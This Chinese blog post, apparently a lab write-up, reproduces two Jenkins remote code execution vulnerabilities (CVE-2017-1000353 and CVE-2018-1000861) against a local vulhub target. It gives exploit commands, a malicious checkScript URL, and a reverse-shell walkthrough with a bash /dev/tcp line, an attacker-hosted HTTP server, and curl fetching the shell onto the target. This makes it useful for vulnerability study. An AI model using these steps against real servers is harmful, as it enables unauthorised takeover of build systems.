【jenkins漏洞复现】CVE-2017-1000353远程代码执行漏洞+CVE-2018-1000861未授权弱口令用户可执行任意命令

最新推荐文章于 2024-06-06 09:35:34 发布
最新推荐文章于 2024-06-06 09:35:34 发布
阅读量949 收藏 2
点赞数
分类专栏: 漏洞复现 文章标签: jenkins 安全漏洞
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/serendipity1130/article/details/120009906
版权

CVE-2017-1000353

1.扫描开放了8080端口,访问8080端口:

2、执行下面命令,生成字节码文件:

java -jar CVE-2017-1000353-1.1-SNAPSHOT-all.jar jenkins_poc.ser "touch /tmp/success"

3、执行上述代码后,生成jenkins_poc.ser文件,这就是序列化字符串,#"touch..."是待执行的任意命令

4、修改exploit.py,把proxies里面的内容注释掉

6、执行如下命令,把刚才生成的字节码文件(Jenkins_poc.ser)发送给目标:

python exploit.py http://192.168.225.139:8080 jenkins_poc.ser

7.在靶机的/tmp/success目录下查看是否创建成功,成功即漏洞成功利用。到~/桌面/vulhub/jenkins/CVE-2017-1000353目录下执行:

docker-compose exec jenkins bash

CVE-2018-1000861

Jenkins使用Stapler框架开发,其允许用户通过URL PATH来调用一次public方法。由于这个过程没有做限制,攻击者可以构造一些特殊的PATH来执行一些敏感的Java方法。

通过这个漏洞,我们可以找到很多可供利用的利用链。其中最严重的就是绕过Groovy沙盒导致未授权弱口令用户可执行任意命令Jenkins在沙盒中执行Groovy前会先检查脚本是否有错误,检查操作是没有沙盒的,攻击者可以通过Meta-Programming的方式,在检查这个步骤时执行任意命令。

1.在url中输入,但是没有回显:

192.168.225.139:8080/securityRealm/user/admin/descriptorByName/org.jenkinsci.plugins.scriptsecurity.sandbox.groovy.SecureGroovyScript/checkScript?sandbox=true&value=public class x {public x(){"touch /tmp/CVE-2018-1000861_is_success".execute()}}

2.到容器中查看是否创建success,创建成功则漏洞成功利用:

sudo docker exec -it f2150f072e5a /bin/bash

如何反弹shell:

1.在root目录下写一个1.txt内容为反弹shell的:

bash -i >& /dev/tcp/192.168.225.133/1234 0>&1

2.在kali上开一个http服务,让靶机下载这个shell文件到他的机器上:

python3 -m http.server 85

3.然后使用curl命令进行下载,该命令的意思是下在kali的1.txt文件存到靶机的/tmp目录下名字叫1.sh(这里注意我们的txt的文件目录):

python exp.py http://192.168.225.139:8080/ "curl -o /tmp/1.sh http://192.168.225.133:85/1.txt"

4.然后使用脚本执行这个反弹shell的命令:

python exp.py http://192.168.225.139:8080/ "bash /tmp/1.sh"

5.成功反弹shell:

malloc_冲!
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
代码层面分析Jenkins授权访问CVE-2017-1000353
luoxiayan的博客
09-21 47
/通过上面的ReaderThread.start()方法启动一个线程,ReaderThread为SynchronousCommandTransport类的内部类,在run()方法中,调用ClassicCommandTransport类的read()方法读取输入,read()方法实际是调用Command类的readFrom()方法读取,通过反序列化输入返回一个Command对象。在 run() 方法中,使用一个循环来读取通道中的命令,直到通道被关闭为止。
jenkins漏洞集合
SHELLCODE_8BIT的博客
03-01 4529
复现文章和脚本大都是网上收集,大部分能找到出处的,个别找不到明确的地址。
jenkins 代码执行CVE-2017-1000353漏洞复现
weixin_42675091的博客
09-23 552
jenkins 代码执行CVE-2017-1000353漏洞复现
探索RAU_crypto:Telerik UI for ASP.NET AJAX的安全利器
最新发布
gitblog_00054的博客
06-06 872
探索RAU_crypto:Telerik UI for ASP.NET AJAX的安全利器 项目地址:https://gitcode.com/bao7uo/RAU_crypto RAU_crypto是一个强大的Python工具,专为针对Telerik UI for ASP.NET AJAX的漏洞进行利用和安全测试而设计。它集成了文件上传漏洞CVE-2017-11317和CVE-2017-1135...
Jenkins授权访问漏洞
qq_50854662的博客
07-08 1743
Jenkins授权访问漏洞
CVE-2017-17215 HG532e 远程命令执行漏洞分析
tigerOrtiger的博客
11-10 3467
CVE-2017-17215 HG532e 远程命令执行漏洞分析 0x01 前言 HG532e 是华为的一款无线路由器。 这个漏洞是由蜜罐捕获到payload 之后,才被checkpoint 披露出来的。 这都是好几年前的洞了,但是可以作为分析固件,模拟固件很好的学习例子。 接下来跟我一起来体验跑固件的乐趣吧 …QAQ happy hacking !!! 0x02 搭建固件模拟环境 首先固件模拟,需要现成的固件 下载链接 HG532e 下载不了可以留言给我。 固件模拟这里有两种方式: 一种是 利用现有
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)1
08-04
Jenkins Git client插件命令执行漏洞(CVE-2019-10392)Jenkins Git client插件命令执行漏洞(CVE-2019-10
cve-2019-1003000-jenkins-rce-poc:Jenkins RCE概念证明:SECURITY-1266 CVE-2019-1003000(脚本安全),CVE-2019-1003001(管道:Groovy),CVE-2019-1003002(管道:声明式)
02-05
一种概念验证,允许具有“总体/读取”权限和“作业/配置”(以及可选的“作业/构建”)的用户绕过沙盒保护,并在Jenkins主节点或节点上执行任意代码。 更新: 的文章解释了利用CVE-2018-1000861CVE-2019-1003000...
CVE-2019-1003000 Jenkins-PreAuth-RCE 复现过程1
08-04
CVE-2019-1003000是一个严重的安全漏洞,允许授权的攻击者在认证的情况下执行任意代码复现这个漏洞需要对Java、Jenkins和网络请求有深入的理解。在实际环境中,必须及时修复此类漏洞,以防止潜在的攻击。...
Jenkins任意文件读取漏洞(CVE-2024-23897)复现
fly夏天的博客
01-30 1202
Jenkins任意文件读取漏洞(CVE-2024-23897)复现
Jenkins远程命令执行漏洞CVE-2018-1000861
网络安全。
05-23 3161
漏洞复现 1、查看目标版本。 curl -s -I http://xxx:8080| grep X-Jenkins 2、利用工具。 https://github.com/orangetw/awesome-jenkins-rce-2019 usage: python2.7m exp.py http://target.com ‘curl b2x6ay.dnslog.cn’ 3、成功接收dnslog。 ...
漏洞复现----6、Jenkins远程命令执行漏洞CVE-2018-1000861
七天
11-25 4468
文章目录一、Jenkins简介二、CVE-2018-1000861简介三、漏洞复现 一、Jenkins简介 Jenkins是一个独立的开源自动化服务器,由JAVA开发。 可用于自动化各种任务,如构建,测试和部署软件;也可以根据设定持续定期编译,运行相应代码;运行UT或集成测试;将运行结果发送至邮件,或展示成报告等。 Jenkins可以通过本机系统包Docker安装,也可以通过安装Java Runtime Environment的任何机器独立运行。 在很多中大型金融企业中普遍使用Jenkins来作为项目发
漏洞复现Jenkins反序列化漏洞CVE-2017-100035/ CVE-2018-1000861
weixin_41438728的博客
11-17 252
转载来源:https://blog.csdn.net/weixin_45556536/article/details/109677547
Jenkins 出现严重漏洞,可导致代码执行攻击
smellycat000的专栏
03-09 1576
聚焦源代码安全,网罗国内外最新资讯!编译:代码卫士开源自动化服务器 Jenkins 中存在两个严重漏洞CVE-2023-27898和CVE-2023-27905),可导致攻击者在目标系统上执行代码。这两个漏洞影响 Jenkins 服务器和Update Center,它们被Aqua公司统称为 ‘CorePlague"。Jenkins 2.319.2之前的版本均受影响。Aqua公司在报告中指出,“...
Jenkins-CI 远程代码执行漏洞CVE-2017-1000353
锋刃科技的博客
06-18 655
环境搭建 使用vulhub和docker搭建环境 cd /vulhub/jenkins/CVE-2017-1000353 docker-compose up -d 访问http://your-ip:8080即可看到jenkins已成功运行 漏洞复现 wget https://github.com/vulhub/CVE-2017-1000353/releases/download/1.1/CVE-2017-1000353-1.1-SNAPSHOT-all.jar 获取CVE-2017-1
Jenkins远程代码执行漏洞检查(CVE-2017-1000353
weixin_30675247的博客
05-05 230
Jenkins的反序列化漏洞,攻击者使用该漏洞可以在被攻击服务器执行任意代码漏洞利用不需要任何的权限 漏洞影响范围: 所有Jenkins主版本均受到影响(包括<=2.56版本)所有Jenkins LTS 均受到影响( 包括<=2.46.1版本) 测试步骤: 1.下载生成反序列的payload: https://github.com/nobleXu/jenkins 2.生成...
jenkins java反序列化_Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)
weixin_31308407的博客
02-13 199
Jenkins Java 反序列化远程执行代码漏洞(CVE-2017-1000353)一、漏洞描述该漏洞存在于使用HTTP协议的双向通信通道的具体实现代码中,jenkins利用此通道来接收命令,恶意攻击者可以构造恶意攻击参数远程执行命令,从而获取系统权限,造成数据泄露。二、漏洞影响版本所有jenkins主版本均受到影响(包括<=2.56版本)所有的jenkins LTS均受到影响(包括&lt...
jenkins漏洞安全漏洞CVE-2022-2048和CVE-2021-28169
05-20
攻击者可以利用该漏洞通过SSH连接到Jenkins主机并执行任意命令。该漏洞的CVSS评分为9.8(最高10分),属于严重级别。 CVE-2021-28169是Jenkins中的另一个安全漏洞,存在于Jenkins的Windows安装程序中。攻击者可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值